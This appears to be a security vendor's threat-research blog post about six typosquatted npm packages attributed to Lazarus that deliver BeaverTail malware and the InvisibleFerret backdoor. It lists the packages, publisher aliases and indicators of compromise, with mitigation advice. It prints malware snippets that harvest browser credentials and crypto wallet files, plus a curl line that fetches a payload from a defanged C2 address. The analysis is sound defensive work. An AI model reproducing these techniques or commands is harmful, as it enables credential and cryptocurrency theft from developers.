Research
Security News
Kirill Boychenko
March 10, 2025
North Korea’s Lazarus Group continues to infiltrate the npm ecosystem, deploying six new malicious packages designed to compromise developer environments, steal credentials, extract cryptocurrency data, and deploy a backdoor. In this campaign, Socket researchers uncovered BeaverTail malware embedded within seemingly benign packages — is-buffer-validator, yoojae-validator, event-handle-package, array-empty-validator, react-event-dependency, and auth-validator — each closely mirroring tactics previously documented in Lazarus (Contagious Interview) operations. These findings align with the Socket Threat Research Team’s January 2025 report on the Lazarus APT group’s ongoing supply chain compromises.
The six new packages — collectively downloaded over 330 times — closely mimic the names of widely trusted libraries, employing a well-known typosquatting tactic used by Lazarus-linked threat actors to deceive developers. Additionally, the APT group created and maintained GitHub repositories for five of the malicious packages, lending an appearance of open source legitimacy and increasing the likelihood of the harmful code being integrated into developer workflows.
As of this writing, the packages remain live on the npm registry. We have petitioned their removal and reported the associated GitHub repositories and user accounts.
Attributing this attack definitively to Lazarus or a sophisticated copycat remains challenging, as absolute attribution is inherently difficult. However, the tactics, techniques, and procedures (TTPs) observed in this npm attack closely align with Lazarus’s known operations, extensively documented by researchers from Unit42, eSentire, DataDog, Phylum, and others since 2022.
This campaign exhibits numerous hallmarks of Lazarus’ methodology in deploying malicious packages, including:
The following is a detailed breakdown of the malicious packages, including their associated npm aliases, email addresses, download counts, and linked GitHub repositories and accounts.
is-buffer-validator: Published under the npm alias “edan0831” (email: edanjohn1991@gmail.com), this package has been downloaded 52 times. Its source code is hosted on GitHub at github.com/edan0831/is-buffer-validator, under the edan0831 GitHub account.yoojae-validator: Published under the npm alias “hottblaze” (email: hottblaze012@gmail.com), this package has 55 downloads. The corresponding GitHub repository is github.com/alximmykola379/yoojae-validator, associated with the alximmykola379 GitHub account.event-handle-package: Published under the npm alias “ricardoalexis07” (email: ricardoalexis0629@gmail.com), this package has been downloaded 54 times. Unlike the others, it has no publicly linked GitHub repository.array-empty-validator: Published under the npm alias “alextucker0519” (email: alextucker@softworldnet.com), this package has 59 downloads. The corresponding GitHub repository is github.com/alextucker0519/array-empty-validator, under the alextucker0519 GitHub account.react-event-dependency: Published under the npm alias “elondavid” (email: elondavid888@gmail.com), this package has 57 downloads. Its GitHub repository is available at github.com/elondavid888/react-event-dependency, linked to the elondavid888 account.auth-validator: Published under the npm alias “kevin_tr” (email: robustplutus@gmail.com), this package has 54 downloads. While its original GitHub repository (github.com/kevin-tra/auth-validator) has since been removed, historical records tie it to the kevin-tra GitHub account.
Socket AI Scanner’s identified all six packages as malicious.
Across these packages, Lazarus uses names that closely mimic legitimate and widely trusted libraries, a hallmark of typosquatting tactics. For example, is-buffer-validator closely resembles the widely used is-buffer module authored by Socket CEO Feross Aboukhadijeh. Notably, the Socket Threat Research Team had previously documented Lazarus’ malicious npm activities in its January 2025 report. This resemblance may suggest the threat actor’s awareness of Socket’s research or a strategic attempt to exploit the established trust and widespread adoption of a legitimate library through typosquatting. What a coincidence.
The legitimate is-buffer package, authored by Feross Aboukhadijeh and maintained for over a decade, has 33 million weekly downloads and has been downloaded over 134 million times overall, highlighting its widespread adoption.The code embedded within the malicious npm packages demonstrates the obfuscation techniques observed in earlier Lazarus-linked campaigns. It employs self-invoking functions, dynamic function constructors, and array shifting to obscure its true functionality. Despite these layers of concealment, the malware’s objectives align with previously documented Lazarus operations, which have consistently leveraged multi-stage payload delivery and persistence mechanisms to maintain long-term access to compromised systems.
The code is designed to collect system environment details, including the hostname, operating system, and system directories. It systematically iterates through browser profiles to locate and extract sensitive files such as Login Data from Chrome, Brave, and Firefox, as well as keychain archives on macOS. Notably, the malware also targets cryptocurrency wallets, specifically extracting id.json from Solana and exodus.wallet from Exodus. The stolen data is then exfiltrated to a hardcoded C2 server at hxxp://172.86.84[.]38:1224/uploads, following Lazarus’s well-documented strategy of harvesting and transmitting compromised information.
Below is a code snippet demonstrating the malicious process of extracting and exfiltrating sensitive data, with inline comments explaining key functions and objectives:
// Enumerate user profiles and extract browser data
async function uploadFiles(basePath, prefix, includeSolana, timestamp) {
// basePath: Root directory (e.g., Chrome/Brave user data)
// prefix: Identifier for exfiltrated files
// includeSolana: Flag to collect Solana wallet keys
// timestamp: Tracks exfiltration timing
if (!testPath(basePath)) return; // Skip if directory is inaccessible
// Scan up to 200 browser profiles
for (let i = 0; i < 200; i++) {
const profileDir = `${basePath}/${i === 0 ? 'Default' : 'Profile ' + i}/Local Extension Settings`;
// Look for known extension data (e.g., MetaMask, Exodus)
// Capture .log and .ldb files
}
if (includeSolana) {
// Locate Solana's id.json private key file
const solanaPath = `${homeDir}/.config/solana/id.json`;
if (fs.existsSync(solanaPath)) {
// Extract and exfiltrate Solana wallet data
}
}
// Upload stolen data to the C2 server
}Beyond the silent enumeration and data exfiltration detailed above, the script also downloads additional malicious components — specifically identified as the InvisibleFerret backdoor — using both curl commands and the Node.js request module. The secondary payload (SHA256: 6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0) is downloaded under the filenames p.zi or p2.zip and extracted using tar -xf, following a multi-stage deployment strategy consistent with previous Lazarus campaigns that distributed the BeaverTail malware. The following snippet illustrates one stage of this process:
// Fetch additional malware if p.zi is missing or incomplete
function runP() {
const pFile = `${tmpDir}\\p.zi`;
const p2File = `${tmpDir}\\p2.zip`;
if (fs.existsSync(pFile)) {
// Check file size; rename to .zip for extraction or retry download
} else {
// Download payload from C2 using curl
ex(`curl -Lo "${pFile}" "hxxp://172.86.84[.]38:1224/pdown"`, (error) => {
if (!error) {
// Set file size, rename to p2.zip, and extract
}
});
}
}Through these stages, Lazarus consistently prioritizes persistence and stealth. The script’s objectives go beyond credential theft, seeking to embed itself within development workflows and ensuring continued compromise, even if one stage is detected and removed. By creating or repurposing GitHub repositories for the malicious packages, the threat actor further obscures its activities, making the operation appear as part of legitimate open source development.
We assess that Lazarus and other advanced adversaries will continue to refine their infiltration tactics. Obfuscation techniques are likely to evolve, incorporating more sophisticated code-hiding methods and deeper integration into legitimate development workflows. Threat actors may also broaden their targeting to additional packages and ecosystems to expand their reach among developers, making early detection and contextual dependency scanning more critical than ever.
To mitigate these threats, organizations should implement a multi-layered approach to detection and defense. Automated dependency auditing and code reviews can help identify anomalies in third-party packages, particularly those with low download counts or from unverified sources. Continuous monitoring of unusual dependency changes can expose malicious updates, while blocking outbound connections to known C2 endpoints prevents data exfiltration. Sandboxing untrusted code in controlled environments and deploying endpoint protection can detect suspicious file system or network activities. Additionally, educating development teams on common typosquatting tactics promotes vigilance and reinforces proper vetting before installing new packages.
Despite extensive obfuscation techniques — including variable renaming, string encoding, and control flow flattening — Socket’s static and behavioral analysis effectively identified all six packages as malware. The Socket GitHub app enables real-time scanning of pull requests, alerting developers to suspicious or malicious dependencies before integration. Additionally, incorporating the Socket CLI into npm installation workflows helps detect anomalies before they reach production, while the Socket browser extension proactively warns users of potential threats upon download or viewing. By embedding these security measures into existing development workflows, organizations can significantly mitigate the risk of supply chain attacks.
Socket AI Scanner’s analysis, including contextual details about the malicious is-buffer-validator package.is-buffer-validatoryoojae-validatorevent-handle-packagearray-empty-validatorreact-event-dependencyauth-validatoredan0831 — edanjohn1991@gmail.comhottblaze — hottblaze012@gmail.comricardoalexis07 — ricardoalexis0629@gmail.comalextucker0519 — alextucker@softworldnet.comelondavid — elondavid888@gmail.comkevin_tr — robustplutus@gmail.comedan0831alximmykola379alextucker0519elondavid888kevin-tra172.86.84[.]38hxxp://172.86.84[.]38:1224/uploadshxxp://172.86.84[.]38:1224/pdownhxxp://172.86.84[.]38:1224/client/9/9026a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
Socket and Seal Security collaborate to fix a critical npm overrides bug, resolving a three-year security issue in the JavaScript ecosystem's most popular package manager.
Security News
TypeScript is porting its compiler to Go, delivering 10x faster builds, lower memory usage, and improved editor performance for a smoother developer experience.
Security News
Socket CEO Feross Aboukhadijeh discusses the open web, open source security, and how Socket tackles software supply chain attacks on The Pair Program podcast.